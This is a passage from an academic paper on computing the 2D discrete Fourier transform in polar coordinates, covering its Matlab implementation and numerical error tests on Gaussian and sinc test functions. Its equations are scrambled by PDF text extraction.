|fflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflffl{zfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflffl} scaled 1D DHT row‐wise e þin 2pqN2 |fflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflffl{zfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflffl} inverse 1D DFT column‐wise (35) Yao and Baddour (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.257 14/38 http://dx.doi.org/10.7717/peerj-cs.257 https://peerj.com/computer-science/ where the DHT is defined in Baddour & Chouinard (2015) via the transformation matrix YnN1m;k ¼ 2 jnN1J 2 nþ1 jnkð Þ Jn jnmjnk jnN1 � � 1 � m; k � N1 � 1 (36) Matlab code for the DHT is described in Baddour & Chouinard (2017). The inverse 2D DFT can be similarly interpreted, as shown in “Inverse Transform”. Inverse transform The steps of the inverse 2D DFT are the reverse of the steps outlined above for the forward 2D DFT. For p ¼ �M . . . M and k ¼ 1 . . . N1 � 1, Eq. (2) this can be expressed as fpk ¼ 1 N2 XM n¼�M jnN1i þn 2pR2 XN1�1 m¼1 YnN1k;m XM q¼M Fqme �i 2pnqN2 |fflfflfflfflfflfflfflfflfflfflffl{zfflfflfflfflfflfflfflfflfflfflffl} 1D DFT ðcolumn‐wiseÞ 2 66664 3 77775 |fflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflffl{zfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflffl} scaled 1D DFT ðrow‐wiseÞ e þi 2pnpN2 |fflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflffl{zfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflffl} inverse 1D DFT ðcolumn‐wiseÞ (37) This parallels the steps taken for the continuous case, with each continuous operation (Fourier series, Hankel transform) replaced by its discrete counterpart (DFT, DHT). Therefore, for both forward and inverse 2D-DFT, the sequence of operations is a DFT of each column of the starting matrix, followed by a DHT of each row, a term-by-term scaling, followed by an IDFT of each column. This is a significant computational improvement because by interpreting the transform this way, the Fast Fourier Transform (FFT) can be used, which reduces the computational time quite significantly in comparison with a direct implementation of the summation definitions in Eqs. (1) and (2). Interpretation of the sampled forward transform in Matlab terms To use the built-in Matlab function fft, a few operations are required. First, we define Matlab-friendly indices p0 ¼ p þ ðM þ 1Þ and n0 ¼ n þ ðM þ 1Þ so that p; n ¼ �M . . . M become p0; n0 ¼ 1 . . . 2M þ 1 ¼ 1 . . . N2 (since 2M þ 1 ¼ N2). That is, the primed variables range from 1 . . . 2M þ 1 rather than �M . . . M. Hence, if the matrix f with entries fp0k is defined, where p 0 ¼ 1 . . . N2; k ¼ 1 . . . N1 � 1, then the first step in which is a column-wise DFT can be written as the Matlab-defined DFT as �fn0k ¼ XN2 p0¼1 fpke �2piðp0�1�MÞðn0�1�MÞ N2 (38) The overbar denotes a DFT. The definition of DFT in Matlab is actually given by the relationship �fn0k ¼ XN2 p0¼1 fp0ke �2piðp0�1Þðn0�1Þ N2 (39) Yao and Baddour (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.257 15/38 http://dx.doi.org/10.7717/peerj-cs.257 https://peerj.com/computer-science/ Since the relationship PN2 p0¼1 fp0ke �2piðp0�1Þðn0�1�MÞ N2 ¼ PN2p0¼1 fpke�2piðp 0�1�MÞðn0�1�MÞ N2 is valid, we can sample the original function to obtain the discrete fpk values, put them in the matrix fp0k then shift the matrix fp0k by M þ 1 along the column direction. In Matlab, the function circshift A; K; dimð Þ can be used, which circularly shifts the values in array A by K positions along dimension dim. Inputs K and dim must be scalars. Specifically, dim ¼ 1 indicates the columns of matrix A and dim ¼ 2 indicates the rows of matrix A. Hence, Eq. (38) can be written as �fn0k ¼ fft circshift fp0k; M þ 1; 1 � � ; N2; 1 � � (40) In matrix operations, this is equivalent to stating that each column of fp0k is DFT’ed to yield �fn0k. The second step in Eq. (35) is a DHT of order n, transforming �fn0k ! �̂f n0l so that the k subscript is Hankel transformed to the l subscript. The overhat denotes a DHT. In order to relate the order n to the index n0, we need to shift �fn0k by �ðM þ 1Þ along column direction so that the order ranges from –M to M. �̂f n0l ¼ XN1�1 k¼1 2Jn jnkjnl jnN1 � � jnN1J 2 nþ1 jnkð Þ circshift �f n0k;�ðM þ1Þ;1 � � for n0 ¼ 1...N2; l ¼ 1...N1 �1 where n ¼ n0 � M þ1ð Þ � (41) By using the Hankel transform matrix defined in Baddour & Chouinard (2015), Eq. (41) can be rewritten as �̂f n0l ¼ circshift �f n0k;�ðM þ 1Þ; 1 � � YnN1l;k � �T for n0 ¼ 1 . . . N2; l ¼ 1 . . .N1 � 1 where n ¼ n0 � M � 1 � (42) In matrix operations, this states that each row of �fn0k is DHT’ed to yield �̂f n0l. These are now scaled to give the Fourier coefficients of the 2D DFT �̂f n0l ! �Fn0l. In order to proceed to an IDFT in the next step, it is necessary to shift the matrix by M þ 1 along the column direction after scaling �Fn0l ¼ circshift 2pR2 jnN1 i�n�̂f n0l; M þ 1; 1 � � for n0 ¼ 1 . . . N2; l ¼ 1 . . . N1 � 1 where n ¼ n0 � M þ 1ð Þ � (43) This last step is a 1D IDFT for each column of �Fn0l to obtain Fql. Using 2M þ 1 ¼ N2, and q0 ¼ q þ 1 þ M, this can be written as Fq0l ¼ 1 N2 XN2 n0¼1 �Fnle þi n0�M�1ð Þ 2p q 0�1�Mð Þ N2 for q0 ¼ 1 :: N2; l ¼ 1 :: N1 � 1 ¼ 1 N2 XN2 n0¼1 �Fn0le þiðn0�1Þ 2p q 0�1�Mð Þ N2 ¼ circshift ifft �Fn0l; N2; 1ð Þ; � M þ 1ð Þ; 1ð Þ (44) Yao and Baddour (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.257 16/38 http://dx.doi.org/10.7717/peerj-cs.257 https://peerj.com/computer-science/ Interpretation of the sampled inverse transform in Matlab terms Similar to the forward transform, matlab-friendly indices q0 ¼ q þ ðM þ 1Þ and n0 ¼ n þ ðM þ 1Þ are also defined. Hence, if the matrix F with entries Fq0l is defined, where q0 ¼ 1 . . . N2; l ¼ 1 . . . N1 � 1, it then follows that the first 1D DFT step in Eq. (37) can be written as the Matlab-defined DFT as �Fn0 l ¼ XN2 q0¼1 Fqle �iðn0�M�1Þ 2pðq 0�1�MÞ N2 for n0 ¼ 1 . . . N2; l ¼ 1 . . . N1 � 1 ¼ XN2 q0¼1 Fq0le �iðn0�M�1Þ 2pðq 0�1Þ N2 (45) If the original function can be sampled as Fql and then put into matrix Fq0l, then we need an circshift operation. So Eq. (45) can be written as �Fn0l ¼ fft circshiftðFq0l; M þ 1; 1Þ; N2; 1 � � (46) Subsequently, a DHT of order n is required, transforming �Fn0l ! �̂Fn0l so that the l subscript is Hankel transformed to the k subscript. To achieve this, circshift is also needed here. �̂Fn0k ¼ circshift �Fn0l; �ðM þ 1Þ; 1ð Þ YnN1k;l � �T for n0 ¼ 1 . . . N2; l ¼ 1 . . . N1 � 1 where n ¼ n0 � M � 1 � (47) This is followed by a scaling operation to obtain �̂Fn0k ! �fn0k and then a circshift by ðM þ 1Þ so that �fn0k ¼ circshift jnN1 2pR2 iþn�̂Fn0k; ðM þ 1Þ; 1 � � for n0 ¼ 1 . . . N2; k ¼ 1 . . . N1 � 1 where n ¼ n0 � M þ 1ð Þ � (48) This last step is a 1D IDFT for each column of �fn0k to get fp0k. Using 2M þ 1 ¼ N2, and p0 ¼ p þ 1, Eq. (37) can be written as fp0k ¼ 1 N2 XN2 n0¼1 �f nke þi n0�M�1ð Þ 2p p 0�1�Mð Þ N2 for p0 ¼ 1 . . . N2; k ¼ 1 . . . N1 � 1 ¼ 1 N2 XN2 n0¼1 �f n0ke þi 2p n 0�1ð Þ p0�1�Mð Þ N2 ¼ circshift ifft �f n0k; N2; 1 � � ; �ðM þ 1Þ; 1 � � (49) In conclusion, in this section, by using the interpretation of the kernel as sequential DFT, DHT and IDFT operations, Matlab (or similar software) built-in code can be used to efficiently implement the 2D DFT algorithm in polar coordinates. NUMERICAL EVALUATION OF THE 2D DFT IN POLAR COORDINATES TO APPROXIMATE THE CONTINUOUS FT In this section, the 2D DFT is evaluated for its ability to estimate the continuous FT at the selected special sampling points in the spatial and frequency domains. Yao and Baddour (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.257 17/38 http://dx.doi.org/10.7717/peerj-cs.257 https://peerj.com/computer-science/ Method for testing the algorithm Accuracy In order to test accuracy of the 2D-DFT and 2D-IDFT to calculate approximate the continuous counterpart, the dynamic error is proposed as a metric. The dynamic error is defined as Guizar-Sicairos & Gutiérrez-Vega (2004) EðvÞ ¼ 20 log10 CðvÞ � DðvÞj j max DðvÞj j � � (50) where CðvÞ is the continuous forward or inverse 2D-FT and DðvÞ is the value obtained from the discrete counterpart. The dynamic error is defined as the ratio of the absolute error to the maximum amplitude of the discrete function, calculated on a log scale. Therefore, a large negative value represents an accurate discrete transform. The dynamic error is used instead of the percentage error in order to avoid division by zero. Precision The precision of the algorithm is an important evaluation criterion, which is tested by sequentially performing a pair of forward and inverse transforms and comparing the result to the original function. High precision indicates that numerical evaluation of the transform does not add much error. An average of the absolute error between the original function and the calculated counterpart at each sample point is used to measure the precision. It is given by e ¼ 1 N1 � 1ð Þ N2 XN1�1ð Þ N2 n¼1 f � f j j (51) where f is the original function and f is the value obtained after sequentially performing a forward and then inverse transform. An ideal precision would result in the absolute error being zero. Test functions In this section, three test functions are chosen to evaluate the ability of the discrete transform to approximate the continuous counterpart. The first test case is the circularly symmetric Gaussian function. Given that it is circularly symmetric and that the Gaussian is continuous and smooth, the proposed DFT is expected to perform well. The second test case is “Four-term sinusoid and Sinc” function, which is not symmetric in the angular direction and suffers a discontinuity in the radial direction. The third test function presents a more challenging test function, the “Four-term sinusoid and Modified exponential” function. In this case, the test function is not circularly symmetric and it explodes at the origin (approaches infinity at the origin). Given that as shown above, the sampling grid cannot cover the area around the origin very well, a function that explodes at the origin should give more error and should provide a reasonable test case for evaluating the performance of the discrete transform. The test functions are chosen to test specific aspects of the performance of the discrete transform but also because a closed-form expression for both the function and its transform are available. This then allows a Yao and Baddour (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.257 18/38 http://dx.doi.org/10.7717/peerj-cs.257 https://peerj.com/computer-science/ numerical evaluation of the error between the quantities computed with the 2D DFT and the quantities obtained by evaluating (sampling) the continuous (forward or inverse) transform at the grid points. Gaussian The first function chosen for evaluation is a circular symmetric function which is Gaussian in the radial direction. Specifically, the function in the space domain is given by f ðr; uÞ ¼ e�a2r2 (52) where a is some real constant. Since the function is circularly symmetric, the 2D-DFT is a zeroth-order Hankel Transform (Poularikas, 2010) and is given by Fðr; cÞ ¼ p a2 e �r2 4a2 (53) The graphs for the original function and its continuous 2D-DFT (which is also a Gaussian) are plotted with a ¼ 1 and shown in Fig. 5. From Fig. 5, the function is circular symmetric and fairly smooth in the radial direction. Moreover, the function can be considered as either an effectively space-limited function or an effectively band-limited function. For the purposes of testing it, it shall be considered as a space-limited function and Eqs. (14) and (15) will be used to proceed with the forward and inverse transform in sequence. To perform the transform, the following variables need to be chosen: N2, R and N1. In the angular direction, since the function in the spatial domain is circularly symmetric, N2 can be chosen to be small. Thus, N2 ¼ 15 is chosen. In the radial direction, from plotting the function, it can be seen that the effective space limit can be taken to be R ¼ 5 and the effective band limit can be taken to be Wr ¼ 10. From Eq. (21), j0N1 � R Wr ¼ 50. Therefore, N1 ¼ 17 is chosen (we could also have obtained a rough estimate of N1 from Eq. (24)). However, most of the energy of the Figure 5 (A) Original function (Gaussian) and (B) its continuous 2D-DFT (which is also a Gaussian). Full-size DOI: 10.7717/peerj-cs.257/fig-5 Yao and Baddour (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.257 19/38 http://dx.doi.org/10.7717/peerj-cs.257/fig-5 http://dx.doi.org/10.7717/peerj-cs.257 https://peerj.com/computer-science/ function in both the space and frequency domains is located in the center near the origin. Based on the discussion in “Conclusion”, relatively large values of R and Wr are needed. The effective space limit R ¼ 40 and effective band-limit Wp ¼ 30 are thus chosen, which gives j0N1 � R Wr ¼ 1200. Therefore N1 ¼ 383 is chosen in order to satisfy this constraint. Both cases discussed here (N1 ¼ 17 and N1 ¼ 383) are tested in following. Forward transform Test results with R ¼ 5, N1 ¼ 17 are shown in Figs. 6 and 7. Figure 6 shows the sampled continuous forward transform and the discrete forward transform. Figure 7 shows the error between the sampled values of the continuous transform and the discretely calculated values. From Fig. 7, it can be observed that the error gets bigger at the center, which is as expected because the sampling grid shows that the sampling points can never attain the origin. The maximum value of the error is Emax ¼ �0:9115 dB and this occurs at the center. The average error is Eavg: ¼ �30:4446 dB. Error test results with R ¼ 40, N1 ¼ 383 are shown in Fig. 8. Similar to the previous case, the error gets larger at the center, as expected. However, the maximum value of the error is Emax ¼ �8:3842 dB and this occurs at the center. The average value of the error is Eavg: ¼ �63:8031 dB. Clearly, the test with R ¼ 40, N1 ¼ 383 gives a better approximation, which verifies the discussion in “Conclusion”. With R ¼ 40, Table 3 shows the errors (max and average error) with respect to different value of N1 and N2. The trends as functions of N1 and N2 are shown as plots in Figs. 9 and 10. From Fig. 9, it can be seen that when N1 individually (N2 is fixed at N2 ¼ 15) is less than the minimum of 383 obtained from the sampling theorem, increasing N1 will lead to smaller errors, as expected. When N1 is bigger than the sampling-theorem threshold Figure 6 (A) sampled continuous transform and (B) discrete forward transform for a Gaussian function with R = 5 and N1 = 17. Full-size DOI: 10.7717/peerj-cs.257/fig-6 Yao and Baddour (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.257 20/38 http://dx.doi.org/10.7717/peerj-cs.257/fig-6 http://dx.doi.org/10.7717/peerj-cs.257 https://peerj.com/computer-science/ of 383, increasing N1 still decreases the error which verifies the discussion about sample grid coverage in “Conclusion”. Increasing N1 tends to increase the sample grid coverage and capture more information at the center area and thus leads to smaller errors. From Fig. 10, increasing N2 alone (i.e., without a corresponding increase in N1) leads to larger errors, both Errormax and Erroraverage. Although at first counterintuitive, this result is actually reasonable because the function is radially symmetric which implies that N2 ¼ 1 should be sufficient based on the sampling theorem for the angular direction. Figure 7 Error between the sampled values of the continuous transform and the discretely calculated values for a Gaussian function with R = 5 and N1 = 17. Full-size DOI: 10.7717/peerj-cs.257/fig-7 Figure 8 Error between the sampled values of the continuous transform and the discretely calculated values for a Gaussian function with R = 40 and N1 = 383.Full-size DOI: 10.7717/peerj-cs.257/fig-8 Yao and Baddour (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.257 21/38 http://dx.doi.org/10.7717/peerj-cs.257/fig-7 http://dx.doi.org/10.7717/peerj-cs.257/fig-8 http://dx.doi.org/10.7717/peerj-cs.257 https://peerj.com/computer-science/ Therefore, increasing N2 will not lead to a better approximation. Moreover, from the discussion of the sample grid coverage in “Conclusion”, the sampling grid coverage in both domains gets worse when N2 gets bigger because more information from the center is lost. This problem can be solved by increasing N1 at the same time, but it could be computationally time consuming. Therefore, choosing N2 properly is very important from the standpoint of accuracy and computational efficiency. Figure 9 Error trend between the sampled values of the continuous transform and the discretely calculated values for a Gaussian function, as a function of N1. Full-size DOI: 10.7717/peerj-cs.257/fig-9 Table 3 Error (dB) of forward transform of Gaussian function with R = 40, different value of N1 and N2. N2 N1 283 333 383 433 483 3 Emax. = −21.6 Emax. = −23.0 Emax. = −24.3 Emax. = −25.4 Emax. = −26.3 Eavg. = −71.3 Eavg. = −76.9 Eavg. = −81.8 Eavg. = −86.0 Eavg. = −89.8 7 Emax. = −12.9 Emax. = −14.4 Emax. = −15.7 Emax. = −16.9 Emax. = −17.8 Eavg. = −62.6 Eavg. = −68.3 Eavg. = −73.2 Eavg. = −77.5 Eavg. = −81.4 15 Emax. = −5.4 Emax. = −7.0 Emax. = −8.4 Emax. = −9.6 Emax. = −10.6 Eavg. = −53.1 Eavg. = −58.9 Eavg. = −63.8 Eavg. = −68.1 Eavg. = −72.0 31 Emax. = 2.3 Emax. = 0.5 Emax. = −1.0 Emax. = −2.3 Emax. = −3.4 Eavg. = −42.0 Eavg. = −47.6 Eavg. = −52.5 Eavg. = −56.9 Eavg. = −60.7 61 Emax. = 9.7 Emax. = 7.9 Emax. = 6.4 Emax. = 5.0 Emax. = 3.8 Eavg. = −32.5 Eavg. = −37.5 Eavg. = −42.0 Eavg. = −46.1 Eavg. = −49.8 Yao and Baddour (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.257 22/38 http://dx.doi.org/10.7717/peerj-cs.257/fig-9 http://dx.doi.org/10.7717/peerj-cs.257 https://peerj.com/computer-science/ Inverse transform Test results for the inverse transform with R ¼ 5, N1 ¼ 17 are shown in Figs. 11 and 12. Figure 11 shows the sampled continuous inverse transform and discrete inverse transform and Fig. 12 shows the error between the sampled continuous and discretely calculated values. Figure 11 (A) sampled continuous inverse transform and (B) discrete inverse transform for the Gaussian function for R = 5 and N1 = 17. Full-size DOI: 10.7717/peerj-cs.257/fig-11 Figure 10 Error trend between the sampled values of the continuous transform and the discretely calculated values for a Gaussian function, as a function of N2. Full-size DOI: 10.7717/peerj-cs.257/fig-10 Yao and Baddour (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.257 23/38 http://dx.doi.org/10.7717/peerj-cs.257/fig-11 http://dx.doi.org/10.7717/peerj-cs.257/fig-10 http://dx.doi.org/10.7717/peerj-cs.257 https://peerj.com/computer-science/ Similar to the case for the forward transform, the error gets larger at the center, which is as expected because the sampling grid shows that the sampling points never attain the center. The maximum value of the error is Emax ¼ 3:1954 dB and this occurs at the center. The average of the error is Eavg: ¼ �25:7799 dB. Error test results for the inverse transform with R ¼ 40, N1 ¼ 383 are shown in Fig. 13. In this case, the maximum value of the error is Emax ¼ �12:2602 dB and this occurs at the center. The average of the error is Eavg: ¼ �98:0316 dB. Table 4 shows the errors with respect to different value of N1 and N2, from which Figs. 14 and 15 demonstrate the trend. Figure 13 Error between the sampled continuous inverse transform and discrete inverse transform for the Gaussian function for R = 40 and N1 = 383. Full-size DOI: 10.7717/peerj-cs.257/fig-13 Figure 12 Error between the sampled continuous inverse transform and discrete inverse transform for the Gaussian function for R = 5 and N1 = 17. Full-size DOI: 10.7717/peerj-cs.257/fig-12 Yao and Baddour (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.257 24/38 http://dx.doi.org/10.7717/peerj-cs.257/fig-13 http://dx.doi.org/10.7717/peerj-cs.257/fig-12 http://dx.doi.org/10.7717/peerj-cs.257 https://peerj.com/computer-science/ From Fig. 15 it can be observed that increasing N1 tends to improve the result but not significantly. This could be explained by the discussion for R ¼ 40, N1 ¼ 383 that with fixed R and Wr, increasing N1 will not allow the sampling grid in the frequency domain to get any closer to the origin to capture more information. From Fig. 15, increasing N2 (with fixed N1 ¼ 383) leads to a worse approximation which verifies the discussion for R ¼ 40, N1 ¼ 383. Figure 14 Error trend between the sampled values of the continuous inverse transform and the discretely calculated values for a Gaussian function, as a function of N1. Full-size DOI: 10.7717/peerj-cs.257/fig-14 Table 4 Error (dB) of inverse transform of Gaussian function with R = 40, different value of N1 and N2. N2 N1 283 333 383 433 483 3 Emax. = −25.9 Emax. = −27.5 Emax. = −28.9 Emax. = −30.2 Emax. = −31.3 Eavg. = −115.3 Eavg. = −115.4 Eavg. = −115.4 Eavg. = −115.5 Eavg. = −115.5 7 Emax. = −16.5 Emax. = −18.1 Emax. = −19.4 Emax. = −20.5 Emax. = −21.6 Eavg. = −107.0 Eavg. = −107.1 Eavg. = −107.2 Eavg. = −107.2 Eavg. = −107.2 15 Emax. = −9.7 Emax. = −11.0 Emax. = −12.3 Emax. = −13.4 Emax. = −14.4 Eavg. = −97.9 Eavg. = −98.0 Eavg. = −98.0 Eavg. = −98.1 Eavg. = −98.1 34 Emax. = −4.4 Emax. = −5.5 Emax. = −6.5 Emax. = −7.5 Emax. = −8.3 Eavg. = −86.9 Eavg. = −86.9 Eavg. = −87.0 Eavg. = −87.0 Eavg. = −87.0 61 Emax. = −1.1 Emax. = −1.7 Emax. = −2.4 Emax. = −3.0 Emax. = −3.7 Eavg. = −75.6 Eavg. = −75.6 Eavg. = −75.6 Eavg. = −75.6 Eavg. = −75.7 Yao and Baddour (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.257 25/38 http://dx.doi.org/10.7717/peerj-cs.257/fig-14 http://dx.doi.org/10.7717/peerj-cs.257 https://peerj.com/computer-science/ Performing sequential 2D-DFT and 2D-IDFT results in e ¼ 4:1656 � e�17 where e is calculated with Eq. (51). Therefore, performing sequential forward and inverse transforms does not add much error. Four-term sinusoid & Sinc function The second function chosen for evaluation is given by f ðr; uÞ ¼ sinðarÞ ar ½3 sinðuÞ þ sinð3uÞ þ 4 cosð10uÞ þ 12 sinð15uÞ� (54) which is a sinc function in the radial direction and a four-term sinusoid in the angular direction. The graphs for the original function and the magnitude of its continuous 2D-FT with a ¼ 5 are shown in Fig. 16. From Fig. 16, the function can be considered as a band- limited function. Therefore Eqs. (16) and (17) were used to implement the forward and inverse transform. The continuous 2D-FT can be calculated from Baddour (2011) Fðr; cÞ ¼ X1 n¼�1 2pi�neinc Z1 0 fnðrÞJnðrrÞrdr (55) where fnðrÞ is the Fourier series of f ðr; uÞ and can be written as fnðrÞ ¼ 1 2p Zp �p f ðr; uÞe�inudu (56) Figure 15 Error trend between the sampled values of the continuous inverse transform and the discretely calculated values for a Gaussian function, as a function of N2. Full-size DOI: 10.7717/peerj-cs.257/fig-15 Yao and Baddour (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.257 26/38 http://dx.doi.org/10.7717/peerj-cs.257/fig-15 http://dx.doi.org/10.7717/peerj-cs.257 https://peerj.com/computer-science/ From the sampling theorem for the angular direction, the highest angular frequency in Eq. (54) results in N2 being at least 31 required to reconstruct the signal. Therefore, at least 31 terms are required to calculate the continuous 2D-FT, which can be written as Fðr;cÞ¼ 8pcosð10cÞr10 a ffiffiffiffiffiffiffiffiffiffiffiffiffi a2�r2 p ðaþ ffiffiffiffiffiffiffiffiffiffiffiffiffi a2�r2 p Þ10 ; r, a � 6pisinðcÞ ar ffiffiffiffiffiffiffiffiffiffiffiffiffi r2þa2 p þ2pisin 3arcsin a r � �� sinð3cÞffiffiffiffiffiffiffiffiffiffiffiffiffi r2þa2 p �8psin 10arcsin a r � �� cosð10cÞffiffiffiffiffiffiffiffiffiffiffiffiffi r2þa2 p þ 24pisin 15arcsin a r � �� sinð15cÞffiffiffiffiffiffiffiffiffiffiffiffiffi r2þa2 p ; r.a 8>>>>>>>>>>>>>< >>>>>>>>>>>>>: (57) In the angular direction, the highest frequency term in the function in the space domain is 12sinð15uÞ. From the sampling theorem, the sampling frequency should be at least twice that of the highest frequency present in the signal. Thus, N2 ¼ 41 is chosen in order to go a little past the minimum requirement of 31. In the radial direction, from the graphs of the original function and its 2D-FT, it can be assumed that f ðr; uÞ is space-limited at R ¼ 15 and band-limited at Wr ¼ 30. However, since most of the energy in the space domain is located at the origin, a relatively large band limit should be chosen based on the discussion in “Conclusion”. Therefore, Wr ¼ 90, N1 ¼ 430 are chosen. Forward transform The error results for the forward 2D-DFT of Four-term sinusoid & Sinc function with Wr ¼ 90, N1 ¼ 430 are shown in Fig. 17. The discrete transform does not approximate the continuous transform very well. This is expected because the function in the frequency domain is discontinuous and the sampling points close to the discontinuity will result in a very large error. The maximum value of the error is Errormax ¼ 10:6535 dB Figure 16 Plots of the (A) original function (four-term sinusoid and sinc) and (B) the magnitude of its continuous forward 2D Fourier transform with a = 5. Full-size DOI: 10.7717/peerj-cs.257/fig-16 Yao and Baddour (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.257 27/38 http://dx.doi.org/10.7717/peerj-cs.257/fig-16 http://dx.doi.org/10.7717/peerj-cs.257 https://peerj.com/computer-science/ and this occurs where the discontinuities are located. The average of the error is Erroraverage ¼ �38:7831 dB. With Wr ¼ 90, N1 ¼ 430, Table 5 shows the errors with respect to different value of N1 and N2, from which Figs. 18 and 19 show the trend. From Fig. 18, increasing N1 alone tends improve the average error. The maximum error does not change with N1, which is reasonable because of the discontinuity of the function in the frequency domain. From Fig. 19, increasing N2 leads to Errormax and Erroraverage first improving and then worsening. This is reasonable because when N2 is less than the minimum requirement of 31 from sampling theorem, the test result is actually affected by both sampling point density (from the sampling theorem) and grid coverage (discussed in “Conclusion”). Figure 17 Error results for the forward 2D Fourier transform of the Four-term sinusoid & Sinc function for Wp = 90 and N1 = 430. Full-size DOI: 10.7717/peerj-cs.257/fig-17 Table 5 Error (dB) of the forward transform of ‘four-term sinusoid & Sinc’ function with different value of N1 and N2 of forward transform. N2 N1 330 380 430 480 530 11 Emax. = 4.6 Emax. = 7.1 Emax. = 3.4 Emax. = 9.0 Emax. = 2.8 Eavg. = −33.6 Eavg. = −33.4 Eavg. = −33.5 Eavg. = −35.1 Eavg. = −35.5 21 Emax. = 6.7 Emax. = 10.5 Emax. = 3.2 Emax. = 6.9 Emax. = 3.6 Eavg. = −33.9 Eavg. = −34.6 Eavg. = −37.2 Eavg. = −38.0 Eavg. = −38.1 41 Emax. = 8.5 Emax. = 35.1 Emax. = 10.7 Emax. = 14.6 Emax. = 11.1 Eavg. = −38.7 Eavg. = −38.9 Eavg. = −38.8 Eavg. = −39.8 Eavg. = −41.3 81 Emax. = 9.7 Emax. = 32.7 Emax. = 14.8 Emax. = 22.6 Emax. = 14.5 Eavg. = −34.3 Eavg. = 35.5 Eavg. = −36.2 Eavg. = −37.3 Eavg. = −37.5 161 Emax. = 19.9 Emax. = 30.2 Emax. = 22.5 Emax. = 22.5 Emax. = 16.1 Eavg. = −29.4 Eavg. = −30.7 Eavg. = −31.1 Eavg. = −32.2 Eavg. = −32.8 Yao and Baddour (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.257 28/38 http://dx.doi.org/10.7717/peerj-cs.257/fig-17 http://dx.doi.org/10.7717/peerj-cs.257 https://peerj.com/computer-science/ Increasing N2 should give better results from the point of view of the sampling theorem but worse grid coverage. The result from the combined effects is dependent on the function properties. In the specific case of this function, when N2 is bigger than 31, thereby Figure 18 Error trend between the sampled values of the continuous forward transform and the discretely calculated values for a four-term sinusoid and sinc as a function of N1. Full-size DOI: 10.7717/peerj-cs.257/fig-18 Figure 19 Error trend between the sampled values of the continuous forward transform and the discretely calculated values for a four-term sinusoid and sinc as a function of N2. Full-size DOI: 10.7717/peerj-cs.257/fig-19 Yao and Baddour (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.257 29/38 http://dx.doi.org/10.7717/peerj-cs.257/fig-18 http://dx.doi.org/10.7717/peerj-cs.257/fig-19 http://dx.doi.org/10.7717/peerj-cs.257 https://peerj.com/computer-science/ implying that the angular sampling theorem has been satisfied—the results get worse with increasing N2. Inverse transform The error results for the 2D-IDFT of Four-term sinusoid & Sinc function with Wr ¼ 90, N1 ¼ 430 are shown in Fig. 20. The maximum value of the error is Errormax ¼ �8:6734 dB. The average of the error is Erroraverage ¼ �37:8119 dB. With Wr ¼ 90, N1 ¼ 430, Table 6 shows the errors with respect to different value of N1 and N2, from which Figs. 21 and 22 show the trend. Figure 20 Error results for the 2D inverse discrete Fourier transform of the four-term sinusoid and sinc function for Wp = 90 and N1 = 430. Full-size DOI: 10.7717/peerj-cs.257/fig-20 Table 6 Error (dB) of inverse transform of ‘four-term sinusoid & Sinc’ function with different value of N1 and N2. N2 N1 330 380 430 480 530 11 Emax. = 0.1 Emax. = 0.1 Emax. = 0.1 Emax. = 0.1 Emax. = 0.1 Eavg. = −43.7 Eavg. = −43.7 Eavg. = −46.6 Eavg. = −45.6 Eavg. = −48.1 21 Emax. = 0.7 Emax. = 0.7 Emax. = 0.6 Emax. = 0.6 Emax. = 0.7 Eavg. = −38.3 Eavg. = −38.0 Eavg. = −40.4 Eavg. = −40.6 Eavg. = −42.2 41 Emax. = −9.0 Emax. = −8.5 Emax. = −8.7 Emax. = −8.8 Emax. = −8.6 Eavg. = −35.9 Eavg. = −24.7 Eavg. = −37.8 Eavg. = −38.2 Eavg. = −39.0 81 Emax. = −4.5 Emax. = −4.7 Emax. = −4.5 Emax. = −4.6 Emax. = −4.5 Eavg. = −35.7 Eavg. = −26.5 Eavg. = −37.5 Eavg. = −36.2 Eavg. = −39.0 161 Emax. = 0.8 Emax. = 0.7 Emax. = 0.7 Emax. = 0.7 Emax. = 0.7 Eavg. = −35.6 Eavg. = −32.5 Eavg. = −36.6 Eavg. = −37.2 Eavg. = −39.2 Yao and Baddour (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.257 30/38 http://dx.doi.org/10.7717/peerj-cs.257/fig-20 http://dx.doi.org/10.7717/peerj-cs.257 https://peerj.com/computer-science/ From Fig. 21, it can be observed that the increasing N1 alone improves the average error, as was expected. However, N1 ¼ 380 gives an apparently worse average error than the other points. This could be caused by the discontinuity of the function in the frequency Figure 21 Error trend between the sampled values of the continuous inverse transform and the discretely calculated values for a four-term sinusoid and sinc function, as a function of N1. Full-size DOI: 10.7717/peerj-cs.257/fig-21 Figure 22 